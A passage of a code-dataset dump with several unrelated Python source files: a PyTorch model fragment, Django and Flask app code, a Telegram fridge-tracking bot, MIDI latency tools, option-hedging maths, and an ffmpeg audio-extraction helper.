2. 
cpt encoder-attention\n input_cpt = self.cpt_word_embed(cpt_word) # [batch_sizes,17,embedding_dim ]\n # print('input_cpt--------', input_cpt)\n # cpt_attention = self.cpt_attention(input_cpt).transpose(0, 1).squeeze(0)\n x = self.dropout(input_cpt)\n cpt_res_begin = x\n x = self.cpt_attention(x)\n cpt_output_begin = x.squeeze(1)\n\n # 1.2 res_first stage\n x = self.con1(cpt_res_begin)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n cpt_res_mid = x\n x = self.cpt_attention(x)\n cpt_output_mid = x.squeeze(1)\n\n # 1.3 res_two stage\n x = self.con1(cpt_res_mid)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n x = self.cpt_attention(x)\n cpt_output_third = x.squeeze(1)\n # '''\n\n\n A = torch.cat((output_begin, output_mid, output_third, cpt_output_begin, cpt_output_mid, cpt_output_third), -1)\n # A = torch.cat((output_begin, output_mid, output_third), -1)\n\n logits = self.fc(A)\n # print(\"logits--------\", logits.shape) # [64, 7]\n\n return logits\n","repo_name":"smilegnt/CRFA","sub_path":"model/CRFA_withoutContext.py","file_name":"CRFA_withoutContext.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23707002283","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\n\n\nclass GrowingFertilizer(models.Model):\n \"\"\"\n Represents a fertilizer with nutrient composition.\n\n Fields:\n user (ForeignKey): Reference to the user who added this fertilizer.\n name (CharField): The brand name of the fertilizer.\n description (TextField): A description of the fertilizer.\n nitrogen (DecimalField): The percentage of nitrogen(N) content.\n phosphorus (DecimalField): The percentage of phosphorus(P) content.\n potassium (DecimalField): The percentage of potassium(K) content.\n added_on (DateTimeField): The date and time when the fertilizer was added.\n \"\"\"\n\n user = models.ForeignKey(\n get_user_model(),\n on_delete=models.CASCADE,\n null=True\n )\n name = models.CharField(\n max_length=100,\n blank=True,\n help_text='Brand name of the fertilizer.'\n )\n description = models.TextField(\n blank=True,\n help_text='Description of the fertilizer.'\n )\n nitrogen = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n help_text='Percentage of nitrogen content in the fertilizer.'\n )\n phosphorus = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n help_text='Percentage of phosphorus content in the fertilizer.'\n )\n potassium = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n help_text='Percentage of potassium content in the fertilizer.'\n )\n added_on = models.DateTimeField(\n auto_now_add=True\n )\n\n def __str__(self):\n return f\"{self.name} (N:{self.nitrogen}% P:{self.phosphorus}% K:{self.potassium}%)\"\n\n class Meta:\n ordering = ['-added_on']\n","repo_name":"RafaelPuello/CyBotany","sub_path":"apps/botany/models/growing_fertilizer.py","file_name":"growing_fertilizer.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20988025703","text":"from ..models import User, Course, User_Courses, db\nfrom flask_login import current_user\nfrom flask import jsonify\n\ndef addCourses(course_names,semesters_,status_):\n if len(semesters_)!=len(course_names):\n return jsonify({'message':'ERROR, courses and semesters dont line up',\n 'status':'400'})\n for e in range(len(course_names)):\n #check if course is already in courses table:\n courseCheck = 
Course.query.filter_by(course_name=course_names[e],semester=semesters_[e]).first()\n if courseCheck is None:\n course_=Course(course_name=course_names[e],semester=semesters_[e])\n db.session.add(course_)\n db.session.commit()\n courseCheck = Course.query.filter_by(course_name=course_names[e],semester=semesters_[e]).first()\n\n \n course_=User_Courses(user_id=current_user.id,course_id=courseCheck.course_id, status = status_ )\n db.session.add(course_)\n db.session.commit()\n \n return jsonify({'message':'Sucessfully added courses',\n 'status':'200'})\n\ndef deleteCourses(course_names,semesters_):\n if len(semesters_)!=len(course_names):\n return jsonify({'message':'ERROR, courses and semesters dont line up',\n 'status':'400'})\n \n for e in range(len(course_names)):\n course_= User_Courses.query.filter_by(user_id=current_user.id).join(Course).filter_by(course_name=course_names[e],semester = semesters_[e]).first()\n if course_ is not None:\n db.session.delete(course_)\n db.session.commit()\n else:\n return jsonify({\"message\":\"invalid course name entered\",\n \"status\": \"400\"})\n \n return jsonify({\"message\":\"successfuly deleted course\",\n 'status':'200'})\n\ndef getCourses():\n # courses = Course.query.join(User_Courses).filter_by(user_id=current_user.id).all()\n # courses = User_Courses.query.filter_by(user_id=current_user.id).join(Course).all()\n courses=Course.query.join(User_Courses).filter(User_Courses.user_id==current_user.id)\\\n .add_columns(User_Courses.status,Course.course_name,Course.semester).all()\n return jsonify({'courses': [{'id': course.course_name, 'semester': course.semester, 'status':course.status} for course in courses]})\n\n ","repo_name":"rashidkolaghassi/CourseConnects","sub_path":"app/functions/courses_functions.py","file_name":"courses_functions.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33503202373","text":"\"\"\" write DOE from YAML file \"\"\"\n\nimport sys\nimport importlib\n\nfrom pp.config import CONFIG\nfrom pp.doe import load_does\nfrom pp.write_doe import write_doe\n\n\ndef import_custom_doe_factories():\n \"\"\" Find if we have custom DOEs on this config.\n Make them available in component_type2factory\n \"\"\"\n\n sys.path += [CONFIG[\"mask_root_directory\"]]\n if CONFIG[\"custom_components\"]:\n try:\n importlib.import_module(CONFIG[\"custom_components\"])\n except Exception:\n pass\n\n\ndef write_doe_from_yaml(filepath):\n \"\"\" Loads DOE settings from yaml file and writes GDS into build_directory\n\n Args:\n filepath: YAML file describing DOE\n\n Returns:\n gdspaths: list\n\n For each DOE save:\n\n - GDS\n - json metadata\n - ports CSV\n - markdown report, with DOE settings\n \"\"\"\n does = load_does(filepath)\n\n gdspaths = []\n for doe_name, doe in does.items():\n # print(doe_name)\n # print(doe.get(\"settings\"))\n # print(doe.get(\"do_permutations\"))\n # print(doe)\n # print(list(doe.keys()))\n # print(type(doe.get('settings')))\n # assert type(doe.get('settings'))\n d = write_doe(\n component_type=doe.get(\"component\"),\n doe_name=doe_name,\n do_permutations=doe.get(\"do_permutations\", True),\n list_settings=doe.get(\"settings\"),\n description=doe.get(\"description\"),\n analysis=doe.get(\"analysis\"),\n test=doe.get(\"test\"),\n functions=doe.get(\"functions\"),\n )\n gdspaths.append(d)\n return gdspaths\n\n\ndef test_write_doe_from_yaml():\n does_path = CONFIG[\"samples_path\"] / \"mask\" / \"does.yml\"\n gdspaths = 
write_doe_from_yaml(does_path)\n print(gdspaths)\n\n\nif __name__ == \"__main__\":\n test_write_doe_from_yaml()\n","repo_name":"PsiQ/gdsfactory","sub_path":"pp/write_doe_from_yaml.py","file_name":"write_doe_from_yaml.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"16"} +{"seq_id":"23665084109","text":"import logging\r\nimport datetime\r\nfrom ocr import *\r\nfrom fridge import *\r\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, KeyboardButton, ReplyKeyboardMarkup, PhotoSize\r\nfrom telegram.ext import Updater, CommandHandler, CallbackQueryHandler, MessageHandler, Filters, RegexHandler,ConversationHandler, InlineQueryHandler, JobQueue, RegexHandler\r\n\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\r\n level=logging.INFO)\r\n\r\nlogger = logging.getLogger(__name__)\r\nknownUser = {}\r\ncommands = {\r\n \"start\" : 'Initialise User',\r\n \"help\" : 'Gives you information about the available commands',\r\n \"add\" : \"Adds food item into your fridge\",\r\n \"used\" : \"Removes food item from fridge\",\r\n \"display\" : \"See what's in your Fridge\",\r\n \"clear\" : \"Resets your fridge\",\r\n \"scan\" : \"Send a photo of your receipt\",\r\n \"addexpiry\" : \"Add expiry date for items\"\r\n }\r\n\r\n#/start\r\n\r\ndef start(bot, update):\r\n cid = update.message.chat_id\r\n if cid not in knownUser:\r\n fridge = Fridge()\r\n knownUser[cid]=fridge\r\n bot.send_message(chat_id=cid, text=\"Hello! This bot helps you to reduce food wastage by managing your fridge.\")\r\n #create a instance of fridge\r\n else:\r\n bot.send_message(chat_id=cid, text=\"User Data already stored!\")\r\n help(bot, update)\r\n\r\n#/Help\r\n\r\ndef help(bot, update):\r\n cid = update.message.chat_id\r\n help_text = \"The following commands are available: \\n\"\r\n for key in commands.keys():\r\n help_text += \"/\" + key + \": \"\r\n help_text += commands[key] + \"\\n\"\r\n bot.send_message(chat_id=cid, text=help_text)\r\n\r\n#USED FOR /Add\r\n\r\ncat = [\"FRUITS\", \"VEGETABLES\", \"MEAT\", \"DAIRY PRODUCTS\", \"OTHERS\"]\r\nCAT, FOOD, OTHERS, EXPIRE= range(4)\r\n\r\ndef add(bot, update):\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n update.message.reply_text('What would you like to add? 
\\n Please choose:', reply_markup=reply_markup)\r\n return CAT\r\n\r\ndef button(bot, update, user_data):\r\n query = update.callback_query\r\n cid = query.message.chat_id\r\n cat = knownUser[cid].get_category(query.data)\r\n user_data[\"Cat\"]= query.data\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n bot.edit_message_text(text=\"{} Selected\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id, reply_markup=reply_markup)\r\n return FOOD\r\n\r\ndef button1(bot, update, user_data):\r\n query = update.callback_query\r\n if query.data== \"Others\":\r\n bot.edit_message_text(text=\"What is the item?\",\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n return OTHERS\r\n else:\r\n user_data[\"fruit\"]= query.data\r\n keyboard = [[\"1\",\"2\",\"3\"],[\"4\",\"5\",\"6\"], [\"7\", \"8\", \"9\"],[\"0\",]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard= True, one_time_keyboard= True)\r\n bot.edit_message_text(text=\"Selected option: {}\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n bot.send_message(chat_id=query.message.chat_id, text= \"How many days to expiry?\", reply_markup = reply_markup)\r\n return EXPIRE\r\n\r\ndef newItem(bot, update, user_data):\r\n text = update.message.text.upper()\r\n user_data['fruit'] = text\r\n cid=update.message.chat_id\r\n knownUser[cid].add_entry_to_cat(text, user_data[\"Cat\"])\r\n keyboard = [[\"1\",\"2\",\"3\"],[\"4\",\"5\",\"6\"], [\"7\", \"8\", \"9\"],[\"0\",]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard= True, one_time_keyboard= True)\r\n bot.send_message(chat_id=cid, text= \"When will it expire?\", reply_markup= reply_markup)\r\n return EXPIRE\r\n\r\ndef expire(bot, update, user_data):\r\n text = update.message.text\r\n user_data['expire'] = text\r\n new= Food(user_data[\"fruit\"], int(user_data['expire']), user_data[\"Cat\"]) #food inital\r\n cid=update.message.chat_id\r\n knownUser[cid].add_food(new) #add food to fridge\r\n bot.send_message(chat_id=cid, text= \"Item Successfully Added\")\r\n return ConversationHandler.END\r\n\r\ndef cancel(bot, update):\r\n update.message.reply_text('Bye!')\r\n return ConversationHandler.END\r\n\r\n#/remove\r\nUSED , REMOVED = range(2)\r\ncat = [\"FRUITS\", \"VEGETABLES\", \"MEAT\", \"DAIRY PRODUCTS\", \"OTHERS\"]\r\n\r\ndef used(bot, update):\r\n cid = update.message.chat_id\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n update.message.reply_text('Please choose what you want to remove:', reply_markup=reply_markup)\r\n return USED\r\n\r\ndef button2(bot, update, user_data):\r\n query = update.callback_query\r\n cid = query.message.chat_id\r\n cat = knownUser[cid].print_by_category(query.data) #get whole inventory for fride\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n bot.edit_message_text('Please choose what you would like to remove:',\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id, reply_markup=reply_markup)\r\n return REMOVED\r\n\r\ndef remove(bot, update, user_data):\r\n query = update.callback_query\r\n cid = query.message.chat_id\r\n knownUser[cid].remove_food(query.data) #remove food\r\n bot.edit_message_text(text=\"{} has been removed\".format(query.data),\r\n 
chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n return ConversationHandler.END\r\n\r\n#/dísplay\r\ndef display(bot, update):\r\n cid = update.message.chat_id\r\n res = knownUser[cid].print_full_fridge() #print food name list\r\n bot.send_message(chat_id=cid, text=res)\r\n\r\n#/time\r\n\r\ndef alert(bot,job):\r\n for k,v in knownUser.items():\r\n res = v.daily_update() #Get list of expired\r\n try:\r\n bot.send_message(chat_id=k, text = res)\r\n except:\r\n continue\r\n\r\n#/clear\r\nCLEAR = 0\r\n\r\ndef clear(bot, update):\r\n cid = update.message.chat_id\r\n keyboard = [[\"Yes\"],[\"No\"]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard,resize_keyboard = True, one_time_keyboard = True)\r\n update.message.reply_text('Are you sure you want to clear your fridge?', reply_markup = reply_markup)\r\n return CLEAR\r\n\r\ndef cfm_Clear(bot, update):\r\n text = update.message.text\r\n cid=update.message.chat_id\r\n if text == \"Yes\":\r\n knownUser[cid].clear()\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n bot.send_message(chat_id=cid, text= \"Fridge has been cleared\")\r\n return ConversationHandler.END\r\n else:\r\n return ConversationHandler.END\r\n\r\n#/scan\r\nPICTURE=0\r\ndef scan(bot, update):\r\n cid = update.message.chat_id\r\n update.message.reply_text('Please send me a picture!')\r\n return PICTURE\r\nscan_res = []\r\ndef image_handler(bot, update):\r\n #file = bot.getFile(update.message.photo.file_id)\r\n #file_id = update.message.photo.file_id\r\n cid = update.message.chat_id\r\n file = bot.getFile(update.message.photo[-1].file_id)\r\n file.download('image.jpg')\r\n text = convert_image(\"C:/Users/justu/Desktop/H&R/image.jpg\")\r\n text= knownUser[cid].add_bulk(text)\r\n\r\n global scan_res\r\n scan_res.extend(text)\r\n\r\n res= \"\"\r\n for i in range(len(text)):\r\n res += str(i+1) + \". \" + text[i][0] + \" \\n\"\r\n bot.send_message(chat_id=cid, text= \"These items are temporary added please add a expiry date to confirm your item! 
\\n\" + res)\r\n return ConversationHandler.END\r\n\r\n#/addexpiry\r\nCHOOSE, ADDITEM, CHOOSE2 = range(3)\r\n\r\ndef make():\r\n list2= list(map(lambda x: x[0], scan_res))\r\n keyboard2 = [[InlineKeyboardButton(text= k, callback_data = k)] for k in list2]\r\n keyboard2.append([InlineKeyboardButton(text= \"Done\", callback_data = \"Done\")])\r\n reply_markup2 = InlineKeyboardMarkup(keyboard2)\r\n return reply_markup2\r\n\r\ndef addexpiry(bot, update):\r\n cid=update.message.chat_id\r\n bot.send_message(chat_id=cid, text= \"Please add an expiry duration!\",reply_markup= make())\r\n return CHOOSE\r\n\r\ndef choose(bot,update):\r\n cid=update.message.chat_id\r\n bot.send_message(chat_id=cid, text= \"Please add an expiry duration!\",reply_markup= make())\r\n return ADDITEM\r\n\r\ndef exp(bot, update, user_data):\r\n query = update.callback_query\r\n if query.data != \"Done\":\r\n user_data[\"fruit\"]= query.data\r\n keyboard = [[\"1\",\"2\",\"3\"],[\"4\",\"5\",\"6\"], [\"7\", \"8\", \"9\"],[\"0\",]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard= True, one_time_keyboard= True)\r\n bot.edit_message_text(text=\"Selected option: {}\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n bot.send_message(chat_id=query.message.chat_id, text= \"How many days to expiry?\", reply_markup = reply_markup)\r\n return ADDITEM\r\n else:\r\n bot.send_message(chat_id=query.message.chat_id, text= \"Items have been successfully added\")\r\n return ConversationHandler.END\r\n\r\ndef newItem2(bot, update, user_data):\r\n text = update.message.text\r\n user_data['expire'] = text\r\n global scan_res\r\n for i in scan_res:\r\n if i[0] == user_data[\"fruit\"]:\r\n res=i[1]\r\n scan_res.remove(i)\r\n new= Food(user_data[\"fruit\"], int(user_data['expire']), res) #food inital\r\n cid=update.message.chat_id\r\n knownUser[cid].add_food(new) #add food to fridge\r\n bot.send_message(chat_id=cid, text= \"Item Successfully Added\")\r\n return CHOOSE2\r\n\r\ndef error(bot, update, error):\r\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\r\n\r\ndef main():\r\n \"\"\"Start the bot.\"\"\"\r\n # Create the EventHandler and pass it your bot's token.\r\n updater = Updater(\"YOUR TOKEN HERE\")\r\n j = updater.job_queue\r\n # Get the dispatcher to register handlers\r\n dp = updater.dispatcher\r\n\r\n # on different commands - answer in Telegram\r\n dp.add_handler(CommandHandler(\"start\", start))\r\n dp.add_handler(CommandHandler(\"help\", help))\r\n dp.add_handler(CommandHandler(\"display\", display))\r\n #dp.add_handler(CommandHandler(\"add\", add))\r\n #dp.add_handler(CallbackQueryHandler(button))\r\n\r\n conv_handler_add = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('add', add)],\r\n\r\n states={CAT: [CallbackQueryHandler(button ,pass_user_data = True)],\r\n FOOD : [CallbackQueryHandler(button1 ,pass_user_data = True)],\r\n OTHERS: [MessageHandler(Filters.text, newItem, pass_user_data = True)],\r\n EXPIRE: [MessageHandler(Filters.text, expire, pass_user_data = True)]\r\n\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_add)\r\n\r\n conv_handler_used = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('used', used)],\r\n\r\n states={USED: [CallbackQueryHandler(button2 ,pass_user_data = True)],\r\n REMOVED: [CallbackQueryHandler(remove ,pass_user_data = True)]\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n 
dp.add_handler(conv_handler_used)\r\n\r\n conv_handler_clear = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('clear', clear)],\r\n\r\n states={CLEAR: [MessageHandler(Filters.text, cfm_Clear)]\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_clear)\r\n\r\n conv_handler_scan = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('scan', scan)],\r\n\r\n states={PICTURE: [MessageHandler(Filters.photo, image_handler)],\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_scan)\r\n\r\n conv_handler_addexpiry = ConversationHandler(\r\n\r\n entry_points=[CommandHandler('addexpiry', addexpiry)],\r\n\r\n states={CHOOSE: [CallbackQueryHandler(exp ,pass_user_data = True)],\r\n ADDITEM:[MessageHandler(Filters.text, newItem2, pass_user_data = True)],\r\n CHOOSE2: [CallbackQueryHandler(choose ,pass_user_data = True)]\r\n\r\n },\r\n\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)])\r\n\r\n dp.add_handler(conv_handler_addexpiry)\r\n\r\n # log all errors\r\n dp.add_error_handler(error)\r\n\r\n #Schedule Jobs\r\n j.run_daily(alert, datetime.time(8,0,0))\r\n\r\n # Start the Bot\r\n updater.start_polling()\r\n\r\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\r\n # SIGTERM or SIGABRT. This should be used most of the time, since\r\n # start_polling() is non-blocking and will stop the bot gracefully.\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"justussoh/Refrigenator","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":13028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36144564480","text":"import time\n\n\nclass PerfSample:\n \"\"\"A midi cmd to be sent and a time stamp for transfer and receiption.\"\"\"\n def __init__(self, midi_cmd, delay=None):\n self.midi_cmd = midi_cmd\n self.delay = delay\n self.tx_ts = None\n self.rx_ts = None\n self.latency = None\n\n def __repr__(self):\n return \"PerfSample(%r, %r)\" % (self.midi_cmd, self.delay)\n\n def send(self, midi_out, ts):\n midi_out.send_message(self.midi_cmd)\n self.tx_ts = ts\n self.rx_ts = None\n if self.delay:\n time.sleep(self.delay)\n\n def recv(self, midi_cmd, ts):\n if midi_cmd != self.midi_cmd:\n return False\n self.rx_ts = ts\n self.latency = self.rx_ts - self.tx_ts\n return True\n\n def reset(self):\n self.tx_ts = None\n self.rx_ts = None\n self.latency = None\n\n def get_latency(self):\n return self.latency\n\n\nclass PerfBurst:\n \"\"\"Send out a set of midi commands and wait for the receiption.\"\"\"\n def __init__(self, default_delay=0):\n self.samples = []\n self.default_delay = default_delay\n self._expect_rx_pos = 0\n self._lost_samples = 0\n\n def _get_timestamp(self):\n # return value in 1ms uni\n return time.perf_counter() * 1000.0\n\n def add_sample(self, sample):\n self.samples.append(sample)\n\n def add_sample_list(self, samples):\n self.samples += list(samples)\n\n def send_samples(self, midi_out):\n self._expect_rx_pos = 0\n self._lost_samples = 0\n for sample in self.samples:\n ts = self._get_timestamp()\n sample.send(midi_out, ts)\n\n def is_done(self):\n return self._expect_rx_pos == len(self.samples)\n\n def incoming_message(self, midi_cmd):\n ts = self._get_timestamp()\n pos = self._expect_rx_pos\n n = len(self.samples)\n while pos < n:\n # found sample\n if self.samples[pos].recv(midi_cmd, ts):\n self._expect_rx_pos = pos + 1\n return True\n 
self._lost_samples += 1\n pos += 1\n self._expect_rx_pos = n\n return False\n\n def get_num_lost(self):\n return self._lost_samples\n\n def wait_done(self, time_out=5, time_sleep=0.1):\n start = time.perf_counter()\n delta = 0\n while delta < time_out:\n if self.is_done():\n return True\n time.sleep(time_sleep)\n delta = time.perf_counter() - start\n return False\n\n def get_latencies(self):\n result = []\n for sample in self.samples:\n latency = sample.get_latency()\n if latency:\n result.append(latency)\n return result\n\n def reset(self):\n for sample in self.samples:\n sample.reset()\n\n\ndef delay_step_generator(delay_step=10, delay=0.001):\n while True:\n if delay_step == 0:\n yield(0.0)\n else:\n for i in range(delay_step-1):\n yield(0.0)\n yield(delay)\n\n\nclass SampleGenerator:\n @staticmethod\n def note_on_sweep(start=0, end=128, step=1, velocity=42, channel=0,\n delay_step=5, delay=0.001):\n result = []\n ds = delay_step_generator(delay_step, delay)\n for note in range(start, end, step):\n cmd = [0x90 | channel, note, velocity]\n result.append(PerfSample(cmd, ds.__next__()))\n return result\n\n @staticmethod\n def note_off_sweep(start=0, end=128, step=1, velocity=42, channel=0,\n delay_step=5, delay=0.001):\n result = []\n ds = delay_step_generator(delay_step, delay)\n for note in range(start, end, step):\n cmd = [0x80 | channel, note, velocity]\n result.append(PerfSample(cmd, ds.__next__()))\n return result\n","repo_name":"cnvogelg/amiditools","sub_path":"host/amiditools/perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"9342493837","text":"import numpy as np\nimport math\nimport scipy.stats\n\ndef calculate_implied_volatility_bs(maturity, strike, spot, q, price, threshold = 0.01, initial = 0.5):\n\t'''\n\tCalculates the implied volatility of the option using the Black-Scholes formula and the\n\tNewton method.\n\t'''\n\n\n\t# Initialize\n\tsigma = initial\n\tdiff = 1\n\n\twhile diff > threshold:\n\t\t# Calculate Black-Scholes spot\n\t\td1 = (np.log(spot/strike) + (q**2 + sigma**2/2) * maturity)/(sigma*math.sqrt(maturity))\n\t\td2 = d1 - sigma * math.sqrt(maturity)\n\t\tbs = spot * scipy.stats.norm.cdf(d1) - strike * math.exp(-q * maturity) * scipy.stats.norm.cdf(d2)\n\n\t\t# First derivaive of BS w.r.t volatility\n\t\tbs_der = spot * math.sqrt(maturity) * math.exp(-d1**2 / 2) / (math.sqrt(2 * math.pi))\n\n\t\t# Calculate the volatility difference\n\t\tdiff = (price - bs) / bs_der\n\n\t\t# updaede\n\t\tsigma += diff\n\n\treturn sigma\n\ndef delta(maturity, strike, spot, q, sigma):\n\t'''\n\tCalculates the option delta (price-sensitivity)\n\t'''\n\n\t# d1 from the Black-Scholes equation\n\td1 = (np.log(spot/strike) + (q**2 + sigma**2 / 2) * maturity)/(sigma*math.sqrt(maturity))\n\n\treturn scipy.stats.norm.cdf(d1)\n\ndef vega(maturity, strike, spot, q, sigma):\n\t'''\n\tCalculates the option vega (volatility-sensitivity)\n\t'''\n\n\t# d1 from the Black-Scholes equation\n\td1 = (np.log(spot/strike) + (q**2 + sigma**2/2) * maturity) / (sigma * math.sqrt(maturity))\n\n\t# Calculate vega value\n\tvega = spot * math.exp(-d1**2 / 2)*math.sqrt(maturity) / (math.sqrt(2 * math.pi))\n\n\t# Return as fraction\n\treturn vega/100\n\ndef delta_hedge(maturity, strike, spot, q, sigma):\n\t'''\n\tReturns the amount of stock to buy (short) for any given option position to\n\tmake the position delta-neutral\n\t'''\n\n\t# Calculate delta. 
This is the number to short the underlying\n\tdelta_bs = delta(maturity, strike, spot, q, sigma)\n\n\treturn -delta_bs\n\ndef vega_hedge(maturity_1, maturity_2, strike, spot, q, sigma):\n\t'''\n\tReturns the multipliers on which to make the portfolio vega-neutral. We should buy\n\talpha amount of the underlying and eta amount of replicating option\n\twith a longer maturity than the original option, maturity_2 > maturity_1\n\t'''\n\n\n\t# Calculate hedged option and replication option deltas\n\tdelta_bs = delta(maturity_1, strike, spot, q, sigma)\n\tdelta_rep = delta(maturity_2, strike, spot, q, sigma)\n\n\t# Calculate hedged option and replication option vegas\n\tvega_bs = vega(maturity_1, strike, spot, q, sigma)\n\tvega_rep = vega(maturity_2, strike, spot, q, sigma)\n\n\t# Alpha is the amount of stock to hold - eta is the amount of replication stock to hold\n\talpha = -delta_bs + vega_bs / vega_rep * delta_rep\n\teta = - vega_bs / vega_rep\n\n\treturn alpha, eta\n\ndef delta_hedge_butterfly(maturity, strikes, spot, q, sigma):\n\t'''\n\tConsider you have a butterfly centered around strikes[1] with ITM and OTM call options at indexes\n\t0 and 2 respectively. This function returns the total number of underlying to hedge the position.\n\t'''\n\n\t# Calculate the values\n\tlong_ITM = delta_hedge(maturity, strikes[0], spot, q, sigma)\n\tlong_OTM = delta_hedge(maturity, strikes[2], spot, q, sigma)\n\tshort_ATM = delta_hedge(maturity, strikes[1], spot, q, sigma)\n\n\treturn long_ITM + long_OTM - 2 * short_ATM\n\ndef vega_hedge_butterfly(maturity_1, maturity_2, strikes, spot, q, sigma):\n\t'''\n\tConsider you have a butterfly centered around strikes[1] with ITM and OTM call options at indexes\n\t0 and 2 respectively. This function returns the total number of underlying to hedge the position\n\tfor both alpha (the underlying) and eta (replicating call of longer maturity)\n\t'''\n\n\t# Calculate the values\n\talpha_long_ITM, eta_long_ITM = vega_hedge(maturity_1, maturity_2, strikes[0], spot, q, sigma)\n\talpha_long_OTM, eta_long_OTM = vega_hedge(maturity_1, maturity_2, strikes[2], spot, q, sigma)\n\talpha_short_ATM, eta_short_ATM = vega_hedge(maturity_1, maturity_2, strikes[1], spot, q, sigma)\n\n\treturn (alpha_long_ITM + alpha_long_OTM - 2 * alpha_short_ATM), eta_long_ITM, eta_long_OTM, - 2 * eta_short_ATM","repo_name":"nnevalainen/portfolio-hedging","sub_path":"code/hedge_functions.py","file_name":"hedge_functions.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33623445369","text":"import os\nimport subprocess\n\n\ndef remove_file_extension(filename):\n \"\"\"\n Remove the file extension from a filename using string methods.\n\n Args:\n filename (str): The input filename.\n\n Returns:\n str: The filename without the file extension.\n \"\"\"\n # Find the last occurrence of the dot (.) 
in the filename\n last_dot_index = filename.rfind(\".\")\n\n # Check if a dot was found and remove the extension if found\n if last_dot_index != -1:\n filename_without_extension = filename[:last_dot_index]\n return filename_without_extension\n else:\n # If no dot was found, return the original filename\n return filename\n\n\ndef extract_audio_from_video(\n video_name: str, video_dir_path: str = \"videos\", audio_out_dir: str = \"audio\"\n):\n audio_name = f\"{remove_file_extension(video_name)}.wav\"\n audio_path = os.path.join(os.getcwd(), audio_out_dir, audio_name)\n video_path = os.path.join(os.getcwd(), video_dir_path, video_name)\n # cmd = [\n # \"ffmpeg\",\n # \"-i\",\n # video_path,\n # \"-vn\",\n # \"-acodec\",\n # \"pcm_s16le\",\n # \"-ar\",\n # \"44100\",\n # \"-ac\",\n # \"2\",\n # audio_path,\n # ]\n cmd = [\n \"ffmpeg\",\n \"-i\",\n video_path,\n \"-vn\", # Disable video stream\n \"-acodec\", \"pcm_s16le\", # Set audio codec to PCM 16-bit little-endian\n \"-ar\", \"44100\", # Set audio sample rate to 44100 Hz\n \"-ac\", \"1\", # Set audio channels to mono (1 channel)\n audio_path\n]\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n return result.returncode\n","repo_name":"Sashi445/caption_it_flask_server","sub_path":"extract_audio.py","file_name":"extract_audio.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27494331480","text":"from rest_framework import viewsets, status, permissions\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.response import Response\nfrom .models import Comments, Item\nfrom .serializers import CommentsSerializer\nfrom django.db.models import Avg\n\n# Create your views here.\n\nfrom rest_framework import permissions\n\n\nclass IsCommentCreator(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n # Check if the request user is the creator of the 